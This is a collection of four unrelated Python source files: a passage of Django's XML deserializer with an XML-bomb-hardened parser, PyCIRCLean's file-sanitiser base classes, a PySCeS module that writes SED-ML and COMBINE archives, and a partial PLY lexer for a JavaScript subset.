return DefusedExpatParser()
def __next__(self):
for event, node in self.event_stream:
if event == "START_ELEMENT" and node.nodeName == "object":
self.event_stream.expandNode(node)
return self._handle_object(node)
raise StopIteration
def _handle_object(self, node):
"""Convert an <object> node to a DeserializedObject."""
# Look up the model using the model loading mechanism. If this fails,
# bail.
Model = self._get_model_from_node(node, "model")
# Start building a data dictionary from the object.
data = {}
if node.hasAttribute('pk'):
data[Model._meta.pk.attname] = Model._meta.pk.to_python(
node.getAttribute('pk'))
# Also start building a dict of m2m data (this is saved as
# {m2m_accessor_attribute : [list_of_related_objects]})
m2m_data = {}
field_names = {f.name for f in Model._meta.get_fields()}
# Deserialize each field.
for field_node in node.getElementsByTagName("field"):
# If the field is missing the name attribute, bail (are you
# sensing a pattern here?)
field_name = field_node.getAttribute("name")
if not field_name:
raise base.DeserializationError(
"<field> node is missing the 'name' attribute")
# Get the field from the Model. This will raise a
# FieldDoesNotExist if, well, the field doesn't exist, which will
# be propagated correctly unless ignorenonexistent=True is used.
if self.ignore and field_name not in field_names:
continue
field = Model._meta.get_field(field_name)
# As is usually the case, relation fields get the special
# treatment.
if field.remote_field and isinstance(field.remote_field, models.ManyToManyRel):
m2m_data[field.name] = self._handle_m2m_field_node(
field_node, field)
elif field.remote_field and isinstance(field.remote_field, models.ManyToOneRel):
data[field.attname] = self._handle_fk_field_node(
field_node, field)
else:
if field_node.getElementsByTagName('None'):
value = None
else:
value = field.to_python(getInnerText(field_node).strip())
data[field.name] = value
obj = base.build_instance(Model, data, self.db)
# Return a DeserializedObject so that the m2m data has a place to live.
return base.DeserializedObject(obj, m2m_data)
def _handle_fk_field_node(self, node, field):
"""
Handle a <field> node for a ForeignKey
"""
# Check if there is a child node named 'None', returning None if so.
if node.getElementsByTagName('None'):
return None
else:
model = field.remote_field.model
if hasattr(model._default_manager, 'get_by_natural_key'):
keys = node.getElementsByTagName('natural')
if keys:
# If there are 'natural' subelements, it must be a natural
# key
field_value = [getInnerText(k).strip() for k in keys]
obj = model._default_manager.db_manager(
self.db).get_by_natural_key(*field_value)
obj_pk = getattr(obj, field.remote_field.field_name)
# If this is a natural foreign key to an object that
# has a FK/O2O as the foreign key, use the FK value
if field.remote_field.model._meta.pk.remote_field:
obj_pk = obj_pk.pk
else:
# Otherwise, treat like a normal PK
field_value = getInnerText(node).strip()
obj_pk = model._meta.get_field(
field.remote_field.field_name).to_python(field_value)
return obj_pk
else:
field_value = getInnerText(node).strip()
return model._meta.get_field(field.remote_field.field_name).to_python(field_value)
def _handle_m2m_field_node(self, node, field):
"""
Handle a <field> node for a ManyToManyField.
"""
model = field.remote_field.model
default_manager = model._default_manager
if hasattr(default_manager, 'get_by_natural_key'):
def m2m_convert(n):
keys = n.getElementsByTagName('natural')
if keys:
# If there are 'natural' subelements, it must be a natural
# key
field_value = [getInnerText(k).strip() for k in keys]
obj_pk = default_manager.db_manager(
self.db).get_by_natural_key(*field_value).pk
else:
# Otherwise, treat like a normal PK value.
obj_pk = model._meta.pk.to_python(n.getAttribute('pk'))
return obj_pk
else:
def m2m_convert(n):
return model._meta.pk.to_python(n.getAttribute('pk'))
return [m2m_convert(c) for c in node.getElementsByTagName("object")]
def _get_model_from_node(self, node, attr):
"""
Look up a model from a <object model=...> or a <field rel=... to=...>
node.
"""
model_identifier = node.getAttribute(attr)
if not model_identifier:
raise base.DeserializationError(
"<%s> node is missing the required '%s' attribute"
% (node.nodeName, attr))
try:
return apps.get_model(model_identifier)
except (LookupError, TypeError):
raise base.DeserializationError(
"<%s> node has invalid model identifier: '%s'"
% (node.nodeName, model_identifier))
def getInnerText(node):
"""Get all the inner text of a DOM node (recursively)."""
# inspired by
# http://mail.python.org/pipermail/xml-sig/2005-March/011022.html
inner_text = []
for child in node.childNodes:
if child.nodeType == child.TEXT_NODE or child.nodeType == child.CDATA_SECTION_NODE:
inner_text.append(child.data)
elif child.nodeType == child.ELEMENT_NODE:
inner_text.extend(getInnerText(child))
else:
pass
return "".join(inner_text)
# Below code based on Christian Heimes' defusedxml
class DefusedExpatParser(_ExpatParser):
"""
An expat parser hardened against XML bomb attacks.
Forbid DTDs, external entity references
"""
def __init__(self, *args, **kwargs):
_ExpatParser.__init__(self, *args, **kwargs)
self.setFeature(handler.feature_external_ges, False)
self.setFeature(handler.feature_external_pes, False)
def start_doctype_decl(self, name, sysid, pubid, has_internal_subset):
raise DTDForbidden(name, sysid, pubid)
def entity_decl(self, name, is_parameter_entity, value, base,
sysid, pubid, notation_name):
raise EntitiesForbidden(name, value, base, sysid, pubid, notation_name)
def unparsed_entity_decl(self, name, base, sysid, pubid, notation_name):
# expat 1.2
raise EntitiesForbidden(name, None, base, sysid, pubid, notation_name)
def external_entity_ref_handler(self, context, base, sysid, pubid):
raise ExternalReferenceForbidden(context, base, sysid, pubid)
def reset(self):
_ExpatParser.reset(self)
parser = self._parser
parser.StartDoctypeDeclHandler = self.start_doctype_decl
parser.EntityDeclHandler = self.entity_decl
parser.UnparsedEntityDeclHandler = self.unparsed_entity_decl
parser.ExternalEntityRefHandler = self.external_entity_ref_handler
class DefusedXmlException(ValueError):
"""Base exception."""
def __repr__(self):
return str(self)
class DTDForbidden(DefusedXmlException):
"""Document type definition is forbidden."""
def __init__(self, name, sysid, pubid):
super().__init__()
self.name = name
self.sysid = sysid
self.pubid = pubid
def __str__(self):
tpl = "DTDForbidden(name='{}', system_id={!r}, public_id={!r})"
return tpl.format(self.name, self.sysid, self.pubid)
class EntitiesForbidden(DefusedXmlException):
"""Entity definition is forbidden."""
def __init__(self, name, value, base, sysid, pubid, notation_name):
super().__init__()
self.name = name
self.value = value
self.base = base
self.sysid = sysid
self.pubid = pubid
self.notation_name = notation_name
def __str__(self):
tpl = "EntitiesForbidden(name='{}', system_id={!r}, public_id={!r})"
return tpl.format(self.name, self.sysid, self.pubid)
class ExternalReferenceForbidden(DefusedXmlException):
"""Resolving an external reference is forbidden."""
def __init__(self, context, base, sysid, pubid):
super().__init__()
self.context = context
self.base = base
self.sysid = sysid
self.pubid = pubid
def __str__(self):
tpl = "ExternalReferenceForbidden(system_id='{}', public_id={})"
return tpl.format(self.sysid, self.pubid)
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Contains the base objects for use when creating a sanitizer using
PyCIRCLean. Subclass or import from FileBase/KittenGroomerBase and implement
your desired behavior.
"""
import os
import hashlib
import shutil
import argparse
import stat
import magic
class FileBase(object):
"""
Base object for individual files in the source directory.
Contains file attributes and various helper methods.
"""
def __init__(self, src_path, dst_path):
"""
Initialized with the source path and expected destination path.
Create various properties and determine the file's mimetype.
"""
self.src_path = src_path
self.dst_dir = os.path.dirname(dst_path)
self.filename = os.path.basename(src_path)
self.size = self._get_size(src_path)
self.is_dangerous = False
self.copied = False
self.symlink_path = None
self._description_string = [] # array of descriptions to be joined
self._errors = {}
self._user_defined = {}
self.should_copy = True
self.mimetype = self._determine_mimetype(src_path)
@property
def dst_path(self):
return os.path.join(self.dst_dir, self.filename)
@property
def extension(self):
_, ext = os.path.splitext(self.filename)
if ext == '':
return None
else:
return ext.lower()
@property
def maintype(self):
main, _ = self._split_mimetype(self.mimetype)
return main
@property
def subtype(self):
_, sub = self._split_mimetype(self.mimetype)
return sub
@property
def has_mimetype(self):
"""True if file has a main and sub mimetype, else False."""
if not self.maintype or not self.subtype:
return False
else:
return True
@property
def has_extension(self):
"""True if self.extension is set, else False."""
if self.extension is None:
return False
else:
return True
@property
def is_symlink(self):
"""True if file is a symlink, else False."""
if self.symlink_path is None:
return False
else:
return True
@property
def description_string(self):
if len(self._description_string) == 0:
return 'No description'
elif len(self._description_string) == 1:
return self._description_string[0]
else:
ret_string = ', '.join(self._description_string)
return ret_string.strip(', ')
@description_string.setter
def description_string(self, value):
if hasattr(self, 'description_string'):
if isinstance(value, str):
if value not in self._description_string:
self._description_string.append(value)
else:
raise TypeError("Description_string can only include strings")
else:
self._description_string = value
def set_property(self, prop_string, value):
"""
Take a property and a value and add them to the file's stored props.
If `prop_string` is part of the file property API, set it to `value`.
Otherwise, add `prop_string`: `value` to `user_defined` properties.
TODO: rewrite docstring
"""
if hasattr(self, prop_string):
setattr(self, prop_string, value)
else:
self._user_defined[prop_string] = value
def get_property(self, prop_string):
"""
Get the value for a property stored on the file.
Returns `None` if `prop_string` cannot be found on the file.
"""
try:
return getattr(self, prop_string)
except AttributeError:
return self._user_defined.get(prop_string, None)
def get_all_props(self):
"""Return a dict containing all stored properties of this file."""
# Maybe move this onto the logger? I think that makes more sense
props_dict = {
'filepath': self.src_path,
'filename': self.filename,
'file_size': self.size,
'mimetype': self.mimetype,
'maintype': self.maintype,
'subtype': self.subtype,
'extension': self.extension,
'is_dangerous': self.is_dangerous,
'is_symlink': self.is_symlink,
'symlink_path': self.symlink_path,
'copied': self.copied,
'description_string': self.description_string,
'errors': self._errors,
'user_defined': self._user_defined
}
return props_dict
def add_error(self, error, info_string):
"""Add an `error`: `info_string` pair to the file."""
self._errors.update({error: info_string})
def add_description(self, description_string):
"""
Add a description string to the file.
If `description_string` is already present, will prevent duplicates.
"""
self.set_property('description_string', description_string)
def make_dangerous(self, reason_string=None):
"""
Mark file as dangerous.
Prepend and append DANGEROUS to the destination file name
to help prevent double-click of death.
"""
if not self.is_dangerous:
self.set_property('is_dangerous', True)
self.filename = 'DANGEROUS_{}_DANGEROUS'.format(self.filename)
if reason_string:
self.add_description(reason_string)
def safe_copy(self, src=None, dst=None):
"""
Copy file and create destination directories if needed.
Sets all exec bits to '0'.
"""
if src is None:
src = self.src_path
if dst is None:
dst = self.dst_path
try:
os.makedirs(self.dst_dir, exist_ok=True)
shutil.copy(src, dst)
current_perms = self._get_file_permissions(dst)
only_exec_bits = 0o0111
perms_no_exec = current_perms & (~only_exec_bits)
os.chmod(dst, perms_no_exec)
except IOError as e:
# Probably means we can't write in the dest dir
self.add_error(e, '')
def force_ext(self, extension):
"""If dst_path does not end in `extension`, append .ext to it."""
new_ext = self._check_leading_dot(extension)
if not self.filename.endswith(new_ext):
# TODO: log that the extension was changed
self.filename += new_ext
if not self.get_property('extension') == new_ext:
self.set_property('extension', new_ext)
def create_metadata_file(self, extension):
# TODO: this method name is confusing
"""
Create a separate file to hold extracted metadata.
The string `extension` will be used as the extension for the file.
"""
ext = self._check_leading_dot(extension)
try:
# Prevent using the same path as another file from src_path
if os.path.exists(self.src_path + ext):
raise KittenGroomerError(
"Could not create metadata file for \"" +
self.filename +
"\": a file with that path exists.")
else:
os.makedirs(self.dst_dir, exist_ok=True)
# TODO: shouldn't mutate state and also return something
self.metadata_file_path = self.dst_path + ext
return self.metadata_file_path
# TODO: can probably let this exception bubble up
except KittenGroomerError as e:
self.add_error(e, '')
return False
def _check_leading_dot(self, ext):
# TODO: this method name is confusing
if len(ext) > 0:
if not ext.startswith('.'):
return '.' + ext
return ext
def _determine_mimetype(self, file_path):
if os.path.islink(file_path):
# libmagic will throw an IOError on a broken symlink
mimetype = 'inode/symlink'
self.set_property('symlink_path', os.readlink(file_path))
else:
try:
mt = magic.from_file(file_path, mime=True)
# libmagic always returns something, even if it's just 'data'
except UnicodeEncodeError as e:
self.add_error(e, '')
mt = None
try:
mimetype = mt.decode("utf-8")
except:
# FIXME: what should the exception be if mimetype isn't utf-8?
mimetype = mt
return mimetype
def _split_mimetype(self, mimetype):
if mimetype and '/' in mimetype:
main_type, sub_type = mimetype.split('/')
else:
main_type, sub_type = None, None
return main_type, sub_type
def _get_size(self, file_path):
"""Filesize in bytes as an int, 0 if file does not exist."""
try:
size = os.path.getsize(file_path)
except FileNotFoundError:
size = 0
return size
def _remove_exec_bit(self, file_path):
current_perms = self._get_file_permissions(file_path)
perms_no_exec = current_perms & (~stat.S_IEXEC)
os.chmod(file_path, perms_no_exec)
def _get_file_permissions(self, file_path):
full_mode = os.stat(file_path, follow_symlinks=False).st_mode
return stat.S_IMODE(full_mode)
class Logging(object):
@staticmethod
def computehash(path):
"""Return the sha256 hash of a file at a given path."""
s = hashlib.sha256()
with open(path, 'rb') as f:
while True:
buf = f.read(0x100000)
if not buf:
break
s.update(buf)
return s.hexdigest()
class KittenGroomerBase(object):
"""Base object responsible for copy/sanitization process."""
def __init__(self, src_root_path, dst_root_path):
"""Initialized with path to source and dest directories."""
self.src_root_path = os.path.abspath(src_root_path)
self.dst_root_path = os.path.abspath(dst_root_path)
def safe_rmtree(self, directory_path):
"""Remove a directory tree if it exists."""
if os.path.exists(directory_path):
shutil.rmtree(directory_path)
def safe_remove(self, file_path):
"""Remove file at file_path if it exists."""
if os.path.exists(file_path):
os.remove(file_path)
def safe_mkdir(self, directory_path):
"""Make a directory if it does not exist."""
if not os.path.exists(directory_path):
os.makedirs(directory_path)
def list_all_files(self, directory_path):
"""Generator yielding path to all of the files in a directory tree."""
for root, dirs, files in os.walk(directory_path):
for filename in files:
filepath = os.path.join(root, filename)
yield filepath
#######################
def processdir(self, src_dir, dst_dir):
"""Implement this function to define file processing behavior."""
raise ImplementationRequired('Please implement processdir.')
class KittenGroomerError(Exception):
"""Base KittenGroomer exception handler."""
def __init__(self, message):
super(KittenGroomerError, self).__init__(message)
self.message = message
class ImplementationRequired(KittenGroomerError):
"""Implementation required error."""
pass
def main(
kg_implementation,
description=("Call a KittenGroomer implementation to process files "
"present in the source directory and copy them to the "
"destination directory.")):
print(description)
parser = argparse.ArgumentParser(prog='KittenGroomer', description=description)
parser.add_argument('-s', '--source', type=str, help='Source directory')
parser.add_argument('-d', '--destination', type=str, help='Destination directory')
args = parser.parse_args()
kg = kg_implementation(args.source, args.destination)
kg.processdir()
| |
"""
PySCeS - Python Simulator for Cellular Systems (http://pysces.sourceforge.net)
Copyright (C) 2004-2015 B.G. Olivier, J.M. Rohwer, J.-H.S Hofmeyr all rights reserved,
Brett G. Olivier (bgoli@users.sourceforge.net)
Triple-J Group for Molecular Cell Physiology
Stellenbosch University, South Africa.
Permission to use, modify, and distribute this software is given under the
terms of the PySceS (BSD style) license. See LICENSE.txt that came with
this distribution for specifics.
NO WARRANTY IS EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK.
Brett G. Olivier
"""
import os, time, numpy, itertools, cStringIO, subprocess, zipfile, cPickle
import pysces
class SBWSEDMLWebApps:
"""
Class that holds useful methods for using SBW Webapps via a SUDS provided soap client
"""
Kclient = None
SBWSEDMLURI = "http://sysbioapps.dyndns.org/SED-ML%20Web%20Tools/Services/SedMLService.asmx?WSDL"
HAVE_SUDS = False
_SED_CURRENT_ = False
def __init__(self, url=None):
"""
Attempt to create a connector if SUDS is install
- *url* the url to the SBW SED-ML SOAP web services only set if the default doesn't work
"""
if url == None:
url = self.SBWSEDMLURI
try:
import suds
self.HAVE_SUDS = True
except:
print('\nERROR: SUDS import error please install from http://pypi.python.org/pypi/suds (or easy_install suds)\n')
self.HAVE_SUDS = False
try:
self.Kclient = suds.client.Client(url)
self.SBWSEDMLURI = url
except:
print('\nERROR: Error connecting to SBW SED-ML web-services \"{}\" please check your internet connection\n'.format(url))
self.HAVE_SUDS = False
def GetVersion(self):
"""
The ubiquitous connection test, returns the webservices version
"""
if not self.HAVE_SUDS or self.Kclient == None:
print('\nERROR: No suds client or connection, cannot comply with your request\n')
return None
try:
print('Connecting ...')
g = self.Kclient.service.GetVersion()
print('done.')
except Exception, ex:
print('\nERROR: GetVersion() exception\n')
print ex
return g
def ConvertScriptToSedML(self, sedscript):
"""
Attempts to convert a string containing a sedml script into SEDML.
See http://libsedml.sourceforge.net/libSedML/SedMLScript.html for more information on SedML script
- *sedscript* A string containing a sedml script
"""
if not self.HAVE_SUDS or self.Kclient == None:
print('\nERROR: No suds client or connection, cannot comply with your request\n')
return None
try:
print('Connecting ...')
g = self.Kclient.service.ConvertScriptToSedML(sedscript)
print('done.')
except Exception, ex:
print('\nERROR: ConvertScriptToSedML() exception\n')
print ex
return g
class SED(object):
script = None
xml = None
cntr = None
sedpath = None
models = None
sims = None
id = None
tasks = None
datagens = None
plots2d = None
libSEDMLpath = None
__sedscript__ = None
__sedxml__ = None
__sedarchive__ = None
omex_description = 'Created with PySCeS (http://pysces.sf.net)'
HAVE_LIBSEDML = False
HAVE_SBWSEDSOAP = False
_SED_CURRENT_ = False
_SED_XML_ = None
sbwsedclient = None
def __init__(self, id, sedpath, libSEDMLpath=None, sbwsedmluri=None):
"""
Try to establish whether we have access to libSEDML locally installed or the SBW SEDML webservices
- *libSEDMLpath* [default=None] uses the default path to "SedMLConsole.exe" unless specified
- *sbwsedmluri* [default=None] uses the default uri for the SBW webservices unless specified
"""
if libSEDMLpath == None:
self.libSEDMLpath = "\"C:\\Program Files (x86)\\SED-ML Script Editor\\SedMLConsole.exe\""
else:
self.libSEDMLpath = libSEDMLpath
if os.path.exists(self.libSEDMLpath):
self.HAVE_LIBSEDML = True
self.sbwsedclient = SBWSEDMLWebApps(sbwsedmluri)
if self.sbwsedclient.HAVE_SUDS:
self.HAVE_SBWSEDSOAP = True
if not self.HAVE_LIBSEDML and not self.HAVE_SBWSEDSOAP:
print('\nNo connection to libSEDML or SEDML webservices.')
#self.sed = {}
self.models = {}
self.sims = {}
self.tasks = {}
self.datagens = {}
self.plots2d = {}
self.id = id
self.sedpath = os.path.join(sedpath, id)
self.cntr = itertools.count()
def addModel(self, id, model):
try:
if not self.models.has_key(id):
self.models[id] = model.clone()
else:
self.models[id] = model.clone()
except:
print('\nWARNING: model clone failed, using more than one model per SED is not recomended!\n')
self.models[id] = model
def addModelAlt(self, id, model):
mid = str(time.time()).split('.')[0]
storeObj(model, os.path.join(self.sedpath, mid))
del model
model = loadObj(os.path.join(self.sedpath, mid)+'.dat')
if not self.models.has_key(id):
self.models[id] = model
else:
self.models[id] = model
os.remove(os.path.join(self.sedpath, mid)+'.dat')
def addSimulation(self, id, start, end, steps, output, initial=None, algorithm='KISAO:0000019'):
if initial == None:
initial = start
S = {'start' : start,
'initial' : initial,
'end' : end,
'steps' : steps,
'algorithm' : algorithm,
'output' : output}
self.sims[id] = S
def addTask(self, id, sim_id, model_id):
assert self.sims.has_key(sim_id), '\nBad simId'
assert self.models.has_key(model_id), '\nBad modelId'
self.tasks[id] = {'sim' : sim_id, 'model' : model_id}
def addDataGenerator(self, var, task_id):
if var.lower() == 'time':
var = 'time'
dgId = 'dg_%s_%s' % (task_id, var)
# dgId = '%s' % (var)
varId = '%s_%s' % (var, self.cntr.next())
self.datagens[dgId] = {'varId' : varId, 'taskId' : task_id, 'var' : var}
def addTaskDataGenerators(self, taskId):
assert self.tasks.has_key(taskId), '\nBad taskId'
print self.tasks
for o_ in self.sims[self.tasks[taskId]['sim']]['output']:
self.addDataGenerator(o_, taskId)
def addPlot(self, plotId, plotName, listOfCurves):
self.plots2d[plotId] = {'name' : plotName,
'curves' : listOfCurves}
def addTaskPlot(self, taskId):
plotId = '%s_plot' % taskId
name = 'Plot generated for Task: %s' % taskId
curves = []
for o_ in self.sims[self.tasks[taskId]['sim']]['output']:
if o_ not in ['Time','TIME', 'time']:
curves.append(('dg_%s_time' % (taskId), 'dg_%s_%s' % (taskId, o_)))
self.addPlot(plotId, name, curves)
def writeSedScript(self, sedx=False):
sedscr = cStringIO.StringIO()
if not os.path.exists(self.sedpath):
os.makedirs(self.sedpath)
for m_ in self.models:
if not sedx:
mf = os.path.join(self.sedpath, '%s-%s.xml' % (self.id, m_))
tmp = (m_, str(os.path.join(self.sedpath,'%s-%s.xml' % (self.id, m_))))
else:
if not os.path.exists(os.path.join(self.sedpath, 'sedxtmp')):
os.makedirs(os.path.join(self.sedpath, 'sedxtmp'))
mf = os.path.join(self.sedpath, 'sedxtmp', '%s-%s.xml' % (self.id, m_))
tmp = (m_, str('%s-%s.xml' % (self.id, m_)))
pysces.interface.writeMod2SBML(self.models[m_], mf)
sedscr.write("AddModel('%s', r'%s', 'urn:sedml:language:sbml')\n" % tmp)
sedscr.write('\n')
for s_ in self.sims:
S = self.sims[s_]
sedscr.write("AddTimeCourseSimulation('%s', '%s', %s, %s, %s, %s)\n" % (s_,\
S['algorithm'], S['start'], S['initial'], S['end'], S['steps']))
sedscr.write('\n')
for t_ in self.tasks:
T = self.tasks[t_]
sedscr.write("AddTask(\'%s\', \'%s\', \'%s\')\n" % (t_, T['sim'], T['model']))
sedscr.write('\n')
for dg_ in self.datagens:
D = self.datagens[dg_]
sedscr.write("AddColumn('%s', [['%s', '%s', '%s']])\n" % (dg_, D['varId'], D['taskId'], D['var']))
sedscr.write('\n')
for p_ in self.plots2d:
P = self.plots2d[p_]
sedscr.write("AddPlot('%s', '%s', [" % (p_, P['name']))
cstr = ''
for c_ in P['curves']:
cstr += "['%s', '%s']," % (c_[0], c_[1])
sedscr.write(cstr[:-1])
sedscr.write("])\n")
sedscr.write('\n')
print '\nThe SED\n++++++\n'
sedscr.seek(0)
print sedscr.read()
sedscr.seek(0)
if not sedx:
sf = os.path.join(self.sedpath, '%s.txt' % (self.id))
else:
sf = os.path.join(self.sedpath, 'sedxtmp', '%s.txt' % (self.id))
F = file(sf, 'w')
F.write(sedscr.read())
F.flush()
F.close()
self.__sedscript__ = sf
print '\nSED-ML script files written to:', sf
def writeSedXML(self, sedx=False):
sedname = '%s.sed.xml' % (self.id)
self.writeSedScript(sedx=sedx)
if not sedx:
sf = os.path.join(self.sedpath, sedname)
else:
sf = os.path.join(self.sedpath, 'sedxtmp', sedname)
if self._SED_CURRENT_:
print '\nBypass active: SED-ML files written to: %s' % self.sedpath
elif self.HAVE_LIBSEDML:
assert os.path.exists(self.libSEDMLpath)
#sedname = '%s.sed.xml' % (self.id)
#self.writeSedScript(sedx=sedx)
#if not sedx:
#sf = os.path.join(self.sedpath, sedname)
#else:
#sf = os.path.join(self.sedpath, 'sedxtmp', sedname)
cmd = ['%s' % str(self.libSEDMLpath), '--fromScript', '%s' % str(self.__sedscript__), '%s' % str(sf)]
print cmd
try:
a = subprocess.call(cmd)
except Exception, ex:
print '\nOops no SED: %s' % ex
self.__sedxml__ = sf
F = file(sf, 'r')
self._SED_XML_ = F.read()
F.close()
del F
print 'SED-ML files written to: %s' % self.sedpath
self.__sedarchive__ = None
elif self.HAVE_SBWSEDSOAP:
print('\nINFO: PySCeS will now try to connect via internet to: http://sysbioapps.dyndns.org ...\n(press <ctrl>+<c> to abort)')
time.sleep(5)
#sedname = '%s.sed.xml' % (self.id)
#self.writeSedScript(sedx=sedx)
#if not sedx:
#sf = os.path.join(self.sedpath, sedname)
#else:
#sf = os.path.join(self.sedpath, 'sedxtmp', sedname)
F = file(self.__sedscript__, 'r')
sedscr = F.read()
F.close()
self._SED_XML_ = self.sbwsedclient.ConvertScriptToSedML(sedscr)
F = file(sf, 'w')
F.write(self._SED_XML_)
F.flush()
F.close()
self.__sedxml__ = sf
print 'SED-ML files written to: %s' % self.sedpath
self.__sedarchive__ = None
else:
raise RuntimeError, '\n'
if self._SED_CURRENT_:
F = file(self.__sedxml__, 'w')
F.write(self._SED_XML_)
F.flush()
F.close()
def writeSedXArchive(self):
self.writeSedXML(sedx=True)
sedxname = '%s.sed.sedx' % (self.id)
#sedxname = '%s.sed.sedx.zip' % (self.id)
ptmp = os.path.join(self.sedpath, 'sedxtmp')
sf = os.path.join(self.sedpath, sedxname)
self.__sedarchive__ = sf
zf = zipfile.ZipFile(sf, mode='w', compression=zipfile.ZIP_DEFLATED)
zf.write(self.__sedxml__, arcname=os.path.split(self.__sedxml__)[-1])
for m_ in self.models:
modname = '%s-%s.xml' % (self.id, m_)
modpath = os.path.join(ptmp, modname)
zf.write(modpath, arcname=modname)
zf.close()
for f_ in os.listdir(ptmp):
os.remove(os.path.join(ptmp, f_))
os.removedirs(ptmp)
if not self._SED_CURRENT_:
self.__sedxml__ = None
self.__sedscript__ = None
print 'SED-ML archive created: %s' % sf
def writeCOMBINEArchive(self, vc_given='PySCeS', vc_family='Software', vc_email='', vc_org='pysces.sourceforge.net'):
"""
Write a COMBINE archive using the following information:
- vc_given
- vc_family
- vc_email
- vc_org
"""
scTime = time.strftime('%Y-%m-%dT%H:%M:%S') + '%i:00' % (time.timezone/60/60)
self.writeSedXML(sedx=True)
sedxname = '%s.sed.omex' % (self.id)
#sedxname = '%s.sed.omex.zip' % (self.id)
sf = os.path.join(self.sedpath, sedxname)
ptmp = os.path.join(self.sedpath, 'sedxtmp')
self.__sedarchive__ = sf
zf = zipfile.ZipFile(sf, mode='w', compression=zipfile.ZIP_STORED)
zf.write(self.__sedxml__, arcname=os.path.split(self.__sedxml__)[-1])
MFstr = ''
MDstr = ''
MFstr += '<omexManifest xmlns="http://identifiers.org/combine.specifications/omex-manifest">\n'
MFstr += ' <content location="." format="http://identifiers.org/combine.specifications/omex"/>\n'
MFstr += ' <content location="./%s" format="http://identifiers.org/combine.specifications/sedml"/>\n' % os.path.split(self.__sedxml__)[-1]
for m_ in self.models:
modname = '%s-%s.xml' % (self.id, m_)
modpath = os.path.join(ptmp, modname)
zf.write(modpath, arcname=modname)
MFstr += ' <content location="./%s" format="http://identifiers.org/combine.specifications/sbml"/>\n' % modname
MFstr += ' <content location="./metadata.rdf" format="http://identifiers.org/combine.specifications/omex-metadata"/>'
MF = file(os.path.join(ptmp, 'manifest.xml'), 'w')
MF.write('<?xml version="1.0" encoding="utf-8"?>\n%s\n</omexManifest>\n' % MFstr)
MF.close()
MD = file(os.path.join(ptmp, 'metadata.rdf'), 'w')
MD.write('<?xml version="1.0" encoding="UTF-8"?>\n')
MD.write('<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"\n')
MD.write(' xmlns:dcterms="http://purl.org/dc/terms/"\n')
MD.write(' xmlns:vCard="http://www.w3.org/2006/vcard/ns#"\n')
MD.write(' xmlns:bqmodel="http://biomodels.net/models-qualifiers">\n')
MD.write(' <rdf:Description rdf:about=".">\n')
#MDstr += ' <dcterms:description>\n %s\n </dcterms:description>\n' % self.omex_description
MDstr += ' <dcterms:creator>\n'
MDstr += ' <rdf:Bag>\n'
MDstr += ' <rdf:li rdf:parseType="Resource">\n'
MDstr += ' <vCard:hasName rdf:parseType="Resource">\n'
MDstr += ' <vCard:family-name>{}</vCard:family-name>\n'.format(vc_family)
MDstr += ' <vCard:given-name>{}</vCard:given-name>\n'.format(vc_given)
MDstr += ' </vCard:hasName>\n'
MDstr += ' <vCard:hasEmail rdf:resource="{}" />\n'.format(vc_email)
MDstr += ' <vCard:organization-name>\n'
MDstr += ' {}\n'.format(vc_org)
MDstr += ' </vCard:organization-name>\n'
MDstr += ' </rdf:li>\n'
MDstr += ' </rdf:Bag>\n'
MDstr += ' </dcterms:creator>\n'
MDstr += ' <dcterms:created rdf:parseType="Resource">\n'
MDstr += ' <dcterms:W3CDTF>{}</dcterms:W3CDTF>\n'.format(scTime)
MDstr += ' </dcterms:created>\n'
MDstr += ' <dcterms:modified rdf:parseType="Resource">\n'
MDstr += ' <dcterms:W3CDTF>{}</dcterms:W3CDTF>\n'.format(scTime)
MDstr += ' </dcterms:modified>\n'
MD.write('{}'.format(MDstr))
MD.write(' </rdf:Description>\n')
MD.write('</rdf:RDF> \n')
MD.close()
zf.write(os.path.join(ptmp, 'manifest.xml'), arcname='manifest.xml')
zf.write(os.path.join(ptmp, 'metadata.rdf'), arcname='metadata.rdf')
zf.close()
for f_ in os.listdir(ptmp):
os.remove(os.path.join(ptmp, f_))
os.removedirs(ptmp)
if not self._SED_CURRENT_:
self.__sedxml__ = None
self.__sedscript__ = None
print 'COMBINE archive created: %s' % sf
def storeObj(obj, filename):
"""
Stores a Python *obj* as a serialised binary object in *filename*.dat
"""
filename = filename+'.dat'
F = file(filename, 'wb')
cPickle.dump(obj, F, protocol=2)
print 'Object serialised as %s' % filename
F.close()
def loadObj(filename):
"""
Loads a serialised Python cPickle from *filename* returns the Python object(s)
"""
assert os.path.exists(filename), '\nTry again mate!'
F = file(filename, 'rb')
obj = cPickle.load(F)
F.close()
return obj
| |
import ply.lex as lex
tokens = (
'ANDAND', # &&
'COMMA', # ,
'DIVIDE', # /
'ELSE', # else
'EQUAL', # =
'EQUALEQUAL', # ==
'FALSE', # false
'FUNCTION', # function
'GE', # >=
'GT', # >
'IDENTIFIER', # identifier names
'IF', # if
'LBRACE', # {
'LE', # <=
'LPAREN', # (
'LT', # <
'MINUS', # -
'NOT', # !
'NUMBER', # [0-9]+
'OROR', # ||
'PLUS', # +
'RBRACE', # }
'RETURN', # return
'RPAREN', # )
'SEMICOLON', # ;
'STRING', # "hello"
'TIMES', # *
'TRUE', # true
'VAR', # var
)
states = (
('javascriptcomment', 'exclusive'),
)
def t_javascriptcomment(token):
r'\/\*'
token.lexer.begin('javascriptcomment')
def t_javascriptcomment_end(token):
r'\*\/'
token.lexer.lineno += token.value.count('\n')
token.lexer.begin('INITIAL')
def t_javascriptcomment_error(token):
token.lexer.skip(1)
def t_eolcomment(token):
r'//.*'
pass
t_ignore = ' \t\v\r'
t_javascriptcomment_ignore = ' \t\v\r'
def t_newline(token):
r'\n'
token.lexer.lineno += 1
def t_error(token):
print "JavaScript Lexer: Illegal Character " + token.value[0]
return token.lexer.skip(1)
def t_NOT(token):
r'!'
return token
def t_ANDAND(token):
r'&&'
return token
def t_OROR(token):
r'\|\|'
return token
def t_DIVIDE(token):
r'/'
return token
def t_TIMES(token):
r'\*'
return token
def t_PLUS(token):
r'\+'
return token
def t_MINUS(token):
r'-'
return token
def t_EQUALEQUAL(token):
r'=='
return token
def t_EQUAL(token):
r'='
return token
def t_COMMA(token):
r','
return token
def t_SEMICOLON(token):
r';'
return token
def t_LBRACE(token):
r'{'
return token
def t_RBRACE(token):
r'}'
return token
def t_LPAREN(token):
r'\('
return token
def t_RPAREN(token):
r'\)'
return token
def t_LE(token):
r'<='
return token
def t_LT(token):
r'<'
return token
